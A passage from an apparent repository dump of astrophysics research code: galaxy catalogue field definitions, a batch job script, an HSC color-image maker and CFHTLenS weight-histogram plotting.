current virial radius for type 0 galaxies, \"infall virial radius\" for type 1,2 galaxies\n ('v_vir' ,'f4' ), #0.0 $ , [km/s] , physical virial velocity of the subhalo the galaxy is/was the center of.\n ('v_max' ,'f4' ), #0.0 $ , [km/s] , physical maximum rotational velocity of the subhalo of which this galaxy is the center, or the last value for satellite galaxies.\n ('gas_spin' ,'f4', 3), #fltarr(3) $ , [Mpc/h km/s] , spin of the cold gas disk of galaxy\n ('stellar_spin' ,'f4', 3), #fltarr(3) $ , [Mpc/h km/s] , spin of the stellar disk of galaxy\n ('infall_v_max' ,'f4' ), #0.0 $ , [km/s] , physical maximum rotational velocity of the host halo of this galaxy atinfallSnap.\n ('infall_v_max_peak' ,'f4' ), #0.0 $ , [km/s] , physical maximum past rotational velocity of the host halo of this galaxy.\n ('infall_snap' ,'f4' ), #0L $ , , id of snapshot the galaxy lost type = 0 status\n ('infall_hot_gas' ,'f4' ), #0.0 $ , [10^10 Msun/h] , mass in hot gas at the time of infall (same as hotGas for type 0 galaxies).\n ('hot_radius' ,'f4' ), #0.0 $ , [Mpc/h] , radius out to which hot gas extends: rvir for type 0; 0 for type 2; maximum radius out to which hot gas is not stripped for type 1.\n ('ori_merg_time' ,'f4' ), #0.0 $ , [yr] , estimated dyniamical friction time (in years) when the merger clock is set.\n ('merg_time' ,'f4' ), #0.0 $ , [yr] , estimated remaining merging time (in years). oriMergeTime - time since the merger clock is set.\n ('distance_to_central_gal' ,'f4', 3), #fltarr(3) $ , [Mpc/h (?)] , distance between this galaxy and the central galaxy of the fof group\n ('cold_gas' ,'f4' ), #0.0 $ , [10^10 Msun /h] , Mass in the cold gas disk.\n ('stellar_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , total mass in stars in the disk and the bulge together.\n ('bulge_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass of stars in the bulge.\n ('disk_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass of stars in the disk.\n ('hot_gas' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in hot gas.\n ('ejected_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in the ejected mass component\n ('black_hole_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass of the central black hole\n ('ICM' ,'f4' ), #0.0 $ , (?)\n ('metals_cold_gas' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in cold gas\n ('metals_bulge_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in bulge\n ('metals_disk_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in disk\n ('metals_hot_gas' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in hot gas\n ('metals_ejected_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in the ejected mass component\n ('metals_ICM' ,'f4' ), #0.0 $ , (?)\n ('primordial_accretion_rate' ,'f4' ), #0.0 $ , [Msun/yr] , Accretion rate of primordial gas.\n ('cooling_rate' ,'f4' ), #0.0 $ , [Msun/yr] , cooling rate\n ('cooling_rate_before_AGN' ,'f4' ), #0.0 $ , [Msun/yr] , cooling rate if there was no AGN feedback.\n ('sfr' ,'f4' ), #0.0 $ , [Msun/yr] , Star formation rate\n ('sfr_bulge' ,'f4' ), #0.0 $ , [Msun/yr] , Star formation rate in bulge.\n ('x_ray_lum' ,'f4' ), #0.0 $ , [log10(erg/sec)] , Log10 of X-Ray luminosity in erg/sec\n ('bulge_size' ,'f4' ), #0.0 $ , [Mpc/h] , Half mass radius of bulge\n ('stellar_disk_radius' ,'f4' ), #0.0 $ , [Mpc/h] , Size of the stellar disk, 3x the scale length.\n ('gas_disk_radius' ,'f4' ), #0.0 $ , [Mpc/h] , Size of the gas disk (?)\n ('cos_inclination' ,'f4' ), #0.0 $ , (?)\n ('disrupt_on' ,'i4' ), #0L $ , , 0: galaxy merged onto merger center; 1: galaxy 
was disrupted before merging onto its descendant, matter went into ICM of merger center\n ('merge_on' ,'i4' ), #0L $ , , 0: merger clock not set yet;\n ('cooling_radius' ,'f4' ), #0.0 $ , [Mpc/h] , the radius within which the cooling time scale is shorter than the dynamical timescale\n ('quasar_accretion_rate' ,'f4' ), #0.0 $ , [Msun/yr] , Rate at which cold gas is accreted into the central black hole in the quasar mode.\n ('radio_accretion_rate' ,'f4' ), #0.0 $ , [Msun/yr] , Rate at which hot gas is accreted into the central black hole in the radio mode.\n ('mag' ,'f4', 40), #fltarr(xx) $ , [mag] , observer-frame apparent (AB) magnitude of galaxy (magnification included, dust extinction not included ?)\n ('mag_bulge' ,'f4', 40), #fltarr(xx) $ , [mag] , observer-frame apparent (AB) magnitude of galaxy bulge (magnification included, dust extinction not included ???)\n ('mag_dust' ,'f4', 40), #fltarr(xx) $ , [mag] , observer-frame apparent (AB) magnitude of galaxy (magnification included, dust extinction included ?)\n ('mass_weight_age' ,'f4' ), #0.0 $ , [10^9 yr] , The age of this galaxy, weighted by mass of its components.\n ('rband_weight_age' ,'f4' ), #0.0 $ , [10^9 yr] , The age of this galaxy, weighted by mass of its components.\n ('sfh_ibin' ,'i4' ), #0L $ , , Index of the higest star formation history bin currently in use.\n ('sfh_numbins' ,'i4' ), #0L $ , , Number of non-empty star formation history bins.\n ('distortion' ,'f4',(2,2)), #fltarr(4) $ , , (11, 12, 21, 22)-components of distortion matrix\n ('plane_number' ,'i4' ) #0L $ , , index of redshift slice (and lens plane) the galaxy is associated with\n ])\n\nfilter_number_for_c_johnson_U = 0\nfilter_number_for_c_johnson_B = 1\nfilter_number_for_c_johnson_V = 2\nfilter_number_for_c_johnson_rc = 3\nfilter_number_for_c_johnson_ic = 4\nfilter_number_for_vista_johnson_Z = 5\nfilter_number_for_vista_johnson_Y = 6\nfilter_number_for_vista_johnson_J = 7\nfilter_number_for_vista_johnson_H = 8\nfilter_number_for_c_johnson_K = 9\nfilter_number_for_vista_johnson_ks = 10\nfilter_number_for_i1_band = 11\nfilter_number_for_i2_band = 12\nfilter_number_for_i3_band = 13\nfilter_number_for_i4_band = 14\nfilter_number_for_u_band_trans = 15\nfilter_number_for_g_band_trans = 16\nfilter_number_for_r_band_trans = 17\nfilter_number_for_i_band_trans = 18\nfilter_number_for_z_band_trans = 19\nfilter_number_for_ACS_WFC_F435W = 20\nfilter_number_for_ACS_WFC_F475W = 21\nfilter_number_for_ACS_WFC_F606W = 22\nfilter_number_for_ACS_WFC_F625W = 23\nfilter_number_for_ACS_WFC_F775W = 24\nfilter_number_for_ACS_WFC_F814W = 25\nfilter_number_for_ACS_WFC_F850_LP = 26\nfilter_number_for_GALEX_FUV = 27\nfilter_number_for_GALEX_NUV = 28\nfilter_number_for_NIC_F110W = 29\nfilter_number_for_NIC_F160W3 = 30\nfilter_number_for_VIMOS_U = 31\nfilter_number_for_WFC3_IR_F105W = 32\nfilter_number_for_WFC3_IR_F125W = 33\nfilter_number_for_WFC3_IR_F160W = 34\nfilter_number_for_WFC3_UVIS_F225W = 35\nfilter_number_for_WFC3_UVIS_F275W = 36\nfilter_number_for_WFC3_UVIS_F336W = 37\nfilter_number_for_WFPC2_F300W = 38\nfilter_number_for_WFPC2_F450W = 39\n\n\n#data_main_dir = '/afs/mpa/temp/hilbert1/Millennium/lensing/maps/GGL_maps/'\ndata_main_dir = '/lfs08/rusucs/0408/'\n\nsource_plane_number = 30\nimage_plane_number = 60\nn_pix = 4096\n\nfield_number_0, field_number_1 = 0,0\ndata_file_name_prefix = 'GGL_los_8_' + str(field_number_0) + '_' + str(field_number_1) + '_N_' + str(n_pix) + '_ang_4_'\n\nimage_plane_number = 60\n\nimage_plane_file_name = data_main_dir + data_file_name_prefix + 
'Henriques2014_galaxies_on_plane_' + str(image_plane_number) + '_f.images'\n\nprint(image_plane_file_name)\n\nwith open(image_plane_file_name, mode = 'rb') as file: # b is important -> binary\n\n    lower_bound = np.fromfile(file, 'f8', 2)\n    # print(lower_bound)\n\n    upper_bound = np.fromfile(file, 'f8', 2)\n    # print(upper_bound)\n\n    plane_angle, = np.fromfile(file, 'f8', 1)\n    # print(plane_angle)\n\n    redshift, = np.fromfile(file, 'f8', 1)\n    # print(redshift)\n\n    n_galaxies, = np.fromfile(file, 'i8', 1)\n    # print(n_galaxies)\n\n    n_cells = np.fromfile(file, 'i4', 2)\n    # print(n_cells)\n\n    galaxy = np.fromfile(file, galaxy_struct, n_galaxies)\n    print(galaxy[0]['mag_dust'][filter_number_for_i_band_trans])\n    #print(galaxy['mag_dust'][:,filter_number_for_i_band_trans]) # this is how to correctly read a column\n\n# below is what I would do to read from a specific location without saving the preceding locations\n#    galaxy = np.fromfile(file, galaxy_struct, 100)\n#    print(galaxy[0]['mag_dust'][filter_number_for_i_band_trans])\n\n#    galaxy = np.fromfile(file, galaxy_struct, -1)\n#    print(galaxy[100]['mag_dust'][filter_number_for_i_band_trans])\n\nprint(n_galaxies)\n" }, { "alpha_fraction": 0.6779963970184326, "alphanum_fraction": 0.7728086113929749, "avg_line_length": 26.950000762939453, "blob_id": "f6ac767a4d37ae939745f0e4e023db61c87abc17", "content_id": "d64a1e53b2790796dc7b580eae3a5635a318a6b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 559, "license_type": "no_license", "max_line_length": 80, "num_lines": 20, "path": "/python/scripts/NAOJ/batch_infersim19.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log19s.out\n#PBS -e Log19s.err\n#PBS -N 19s\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappasimbias.py WFI2033 5 45 23 meds gal gamma oneoverr SIShalo\npython inferkappasimbias.py WFI2033 5 120 23 meds gal gamma oneoverr SIShalo\npython inferkappasimbiasphil.py WFI2033 5 45 23 meds gal gamma oneoverr SIShalo\npython inferkappasimbiasphil.py WFI2033 5 120 23 meds gal gamma oneoverr SIShalo\n" }, { "alpha_fraction": 0.5092611908912659, "alphanum_fraction": 0.5386056303977966, "avg_line_length": 35.67938995361328, "blob_id": "f7bebef6d49e2dc5bd78ac72ec84d248b8d73dec", "content_id": "dfced32e1393482da231de30068d8b12bed195a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4805, "license_type": "no_license", "max_line_length": 253, "num_lines": 131, "path": "/python/image_utilities/HSCcolorcutouts.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Given a folder with .fits RGB images and the input list for DAS Cutout, it produces a color-combined RGB using Humvi (https://github.com/drphilmarshall/HumVI/blob/master/examples/Examples.ipynb )\n\n#from astropy.io import fits\nimport numpy as np\nimport os\nimport sys\nimport glob\nimport humvi\nfrom IPython.display import Image\nfrom astropy.io import fits\n\nimgpath = str(sys.argv[1])\ncat = str(sys.argv[2])\nos.chdir(imgpath)\nfiles = glob.glob('*.fits')\n\n'''\n    The input DAS Cutout catalogue is designed to ask for grizy for each object, in case some of the 
objects are missing some of the gri frames. The first part of the name of the output images produced by DAS Cutout is the line number in the input list.\n'''\n\nlist = np.zeros(len(files))\nfor i in range(len(files)):\n list[i] = int(files[i].split('-')[0])\nlist=np.sort(list)\n\nimcat = np.genfromtxt(cat,usecols=[1,2,3,4],unpack=True,dtype='string')\nimgnr = len(imcat[0]) + 1 # image ID starts at 2\n\npos_g = 2\npos_r = 3\npos_i = 4\npos_z = 5\npos_y = 6\nwhile pos_y <= imgnr:\n print pos_y,'/',imgnr\n pos = [pos_g,pos_r,pos_i,pos_z,pos_y]\n #print pos\n inside = np.in1d(pos, list)\n color = ''\n colorcount = 0\n if inside[0] == True:\n color += 'g'\n if colorcount < 3: colorcount += 1\n if inside[1] == True:\n color += 'r'\n if colorcount < 3: colorcount += 1\n if inside[2] == True:\n color += 'i'\n if colorcount < 3: colorcount += 1\n if inside[3] == True:\n if colorcount < 3:\n color += 'z'\n colorcount += 1\n if inside[4] == True:\n if colorcount < 3:\n color += 'y'\n colorcount += 1\n out = imgpath + imcat[1][pos_g - 2].replace(':','') + imcat[2][pos_g - 2].replace(':','') + '_' + imcat[3][pos_g - 2] + '_' + color + '.png'\n if colorcount == 1:\n bfile = ''\n gfile = ''\n rfile = ''\n here = False\n i = 0\n while here == False:\n if int(files[i].split('-')[0]) in pos:\n bfile, gfile, rfile, outfile = files[i], files[i], files[i], out\n scales, offset, Q, alpha, masklevel, saturation = (1.0,1.0,1.0), 0.5, 1.0, 0.1, -1.0, 'white'\n humvi.compose(rfile, gfile, bfile, scales=scales, Q=Q, alpha=alpha, masklevel=masklevel, saturation=saturation, offset=offset, backsub=False, vb=True, outfile=outfile)\n Image(filename=outfile,width=400)\n here = True\n i += 1\n if colorcount == 2:\n bfile = ''\n gfile = ''\n rfile = ''\n here1 = False\n here2 = False\n i = 0\n while here1 == False or here2 == False:\n if int(files[i].split('-')[0]) in pos:\n if here1 == False:\n bfile = files[i]\n here1 = True\n else:\n here2 = True\n rfile = files[i]\n i += 1\n im1 = fits.open(bfile)\n im2 = fits.open(rfile)\n data = im1[1].data\n data = (im1[1].data + im2[1].data)/2.0\n im1.writeto('tmp.fits',clobber=True)\n gfile, outfile = 'tmp.fits', out\n scales, offset, Q, alpha, masklevel, saturation = (1.0,1.0,1.0), 0.0, 2.0, 0.1, -1.0, 'white'\n humvi.compose(rfile, gfile, bfile, scales=scales, Q=Q, alpha=alpha, masklevel=masklevel, saturation=saturation, offset=offset, backsub=False, vb=True, outfile=outfile)\n Image(filename=outfile,width=400)\n if colorcount == 3:\n bfile = ''\n gfile = ''\n rfile = ''\n here1 = False\n here2 = False\n here3 = False\n i = 0\n while here1 == False or here2 == False or here3 == False:\n if int(files[i].split('-')[0]) in pos:\n if here1 == False:\n bfile = files[i]\n here1 = True\n else:\n if here1 == True and here2 == False:\n here2 = True\n gfile = files[i]\n else:\n if here1 == True and here2 == True:\n here3 = True\n rfile = files[i]\n i += 1\n outfile = out\n scales, offset, Q, alpha, masklevel, saturation = (1.0,1.0,1.0), 0.0, 2.0, 0.1, -1.0, 'white'\n humvi.compose(rfile, gfile, bfile, scales=scales, Q=Q, alpha=alpha, masklevel=masklevel, saturation=saturation, offset=offset, backsub=False, vb=True, outfile=outfile)\n Image(filename=outfile,width=400)\n pos_g += 5\n pos_r += 5\n pos_i += 5\n pos_z += 5\n pos_y += 5\n print colorcount, out\nos.system(\"rm -f tmp.fits\")\n" }, { "alpha_fraction": 0.5746601819992065, "alphanum_fraction": 0.667991578578949, "avg_line_length": 59.71201705932617, "blob_id": "388c43a1b752bc338071c1f0ba2a23a399df9dc0", "content_id": 
"8cec3cda421d95f67363da3a731615563cf8f3e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 61137, "license_type": "no_license", "max_line_length": 278, "num_lines": 1007, "path": "/python/weightinghistogramsuniversalW4combineoldnew.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# fields CFHTLenS W1-4\n# subfields: 171 1deg^2 throughout W1-4\n# cells: 4x4arcmin covering each subfield, in a grid\n# usage: use one of the following arguments: lens name, followed by orig or samp, followed by number of bins, followed by radius (45,60,90 or 120) and by maglimit\n\nimport numpy as np\nimport sys\nimport os\nfrom os import system\n#import scipy\n#from scipy import special\n#from astropy.io import fits\n#from astropy.wcs import WCS\n#from astropy import units as u\n#from astropy.coordinates import SkyCoord\n#from astropy.io import ascii\n#from astropy.table import Table, Column\nimport time\nimport matplotlib.pyplot as plt\n#from numpy.random import normal\nfrom scipy.stats.kde import gaussian_kde\nfrom numpy import linspace\n\nprint(\"Arguments: \\n Lens field: %s \\n Original values or samples drawn from P(z) and P(Mstar): %s \\n Number of bins: %s \\n Radius of each cell: %s \\n Limiting i-band magnitude: %s \\n\" % (str(sys.argv[1]), str(sys.argv[2]), str(sys.argv[3]), str(sys.argv[4]), str(sys.argv[5])))\n\nif (str(sys.argv[2]) == \"samp\") or (str(sys.argv[2]) == \"tab\"):\n print \"This process is both processor and memory intensive and will take a couple of hours for a sampling of 1000...\"\n start_time = time.time()\n\nwith open('fieldsforhist50try_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]))) as f:\n listfields = f.readlines()\n\nwith open('fieldshistW4_50_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W4\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldsforhist75try_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]))) as f:\n listfields = f.readlines()\n\nwith open('fieldshistW4_75_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W4\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldsforhist50try_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]))) as f:\n listfields = f.readlines()\n\nwith open('fieldshistW4_50_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W4\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldsforhist75try_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]))) as f:\n listfields = f.readlines()\n\nwith open('fieldshistW4_75_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W4\" in 
[x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\ncols=1\n\nq_W4_50readnew = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50new = q_W4_50readnew[q_W4_50readnew < 10]\n\nq_W4_75readnew = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75new = q_W4_75readnew[q_W4_75readnew < 10]\n\nq_W4_50readold = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50old = q_W4_50readold[q_W4_50readold < 10]\n\nq_W4_75readold = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75old = q_W4_75readold[q_W4_75readold < 10]\n\nplt.suptitle(r'HE0435 weight histogram test W1-W4', fontsize=10, y=0.998)\n\n\ngauss_q_W4_50old = gaussian_kde(q_W4_50old)\n\ngauss_q_W4_75old = gaussian_kde(q_W4_75old)\n\ngauss_q_W4_50new = gaussian_kde(q_W4_50new)\n\ngauss_q_W4_75new = gaussian_kde(q_W4_75new)\n\nx = linspace(0,2,500)\n\nplt.subplot(451)\nrangemax=4\n\nn_q_W4_50old, bins_q_W4_50old, patches = plt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_50new, bins_q_W4_50new, patches = plt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75old, bins_q_W4_75old, patches = plt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nn_q_W4_75new, bins_q_W4_75new, patches = plt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\n#plt.plot(x,gauss_q_W1_50(x),'b', linewidth=0.5)\nax=plt.subplot(451)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50old[np.argmax(n_q_W4_50old)],np.average(q_W4_50old),np.median(q_W4_50old))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W1_75(x))],np.average(q_W1_75),np.median(q_W1_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75old[np.argmax(n_q_W4_75old)],np.average(q_W4_75old),np.median(q_W4_75old))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50new[np.argmax(n_q_W4_50new)],np.average(q_W4_50new),np.median(q_W4_50new))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % 
(x[np.argmax(gauss_q_W1_75(x))],np.average(q_W1_75),np.median(q_W1_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75new[np.argmax(n_q_W4_75new)],np.average(q_W4_75new),np.median(q_W4_75new))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{gal}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 1\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50new.size)/q_W4_50readnew.size, float(q_W4_75new.size)/q_W4_75readnew.size)\n\ncols=3\n\nq_W4_50readnew = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50new = q_W4_50readnew[q_W4_50readnew < 10]\n\nq_W4_75readnew = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75new = q_W4_75readnew[q_W4_75readnew < 10]\n\nq_W4_50readold = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50old = q_W4_50readold[q_W4_50readold < 10]\n\nq_W4_75readold = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75old = q_W4_75readold[q_W4_75readold < 10]\n\nx = linspace(0,2,500)\n\n\ngauss_q_W4_50old = gaussian_kde(q_W4_50old)\n\ngauss_q_W4_75old = gaussian_kde(q_W4_75old)\n\ngauss_q_W4_50new = gaussian_kde(q_W4_50new)\n\ngauss_q_W4_75new = gaussian_kde(q_W4_75new)\n\nplt.subplot(452)\nrangemax=4\n\nn_q_W4_50old, bins_q_W4_50old, patches = plt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_50new, bins_q_W4_50new, patches = plt.hist(q_W4_50new, histtype='step', color='k', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75old, bins_q_W4_75old, patches = plt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nn_q_W4_75new, bins_q_W4_75new, patches = plt.hist(q_W4_75new, histtype='step', color='k', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_50new, histtype='step', color='k', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_75new, histtype='step', color='k', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n#plt.plot(x,gauss_q_W1_50(x),'b', linewidth=0.5)\nax=plt.subplot(452)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50old[np.argmax(n_q_W4_50old)],np.average(q_W4_50old),np.median(q_W4_50old))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % 
(x[np.argmax(gauss_q_W1_75(x))],np.average(q_W1_75),np.median(q_W1_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75old[np.argmax(n_q_W4_75old)],np.average(q_W4_75old),np.median(q_W4_75old))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50new[np.argmax(n_q_W4_50new)],np.average(q_W4_50new),np.median(q_W4_50new))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W1_75(x))],np.average(q_W1_75),np.median(q_W1_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75new[np.argmax(n_q_W4_75new)],np.average(q_W4_75new),np.median(q_W4_75new))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_\\frac{1}{r}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 2\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50old.size)/q_W4_50readold.size, float(q_W4_75old.size)/q_W4_75readold.size)\n\ncols=5\n\nq_W4_50readnew = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50new = q_W4_50readnew[q_W4_50readnew < 10]\n\nq_W4_75readnew = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75new = q_W4_75readnew[q_W4_75readnew < 10]\n\nq_W4_50readold = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50old = q_W4_50readold[q_W4_50readold < 10]\n\nq_W4_75readold = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75old = q_W4_75readold[q_W4_75readold < 10]\n\nplt.subplot(453)\nrangemax=4\n\nn_q_W4_50old, bins_q_W4_50old, patches = plt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_50new, bins_q_W4_50new, patches = plt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75old, bins_q_W4_75old, patches = 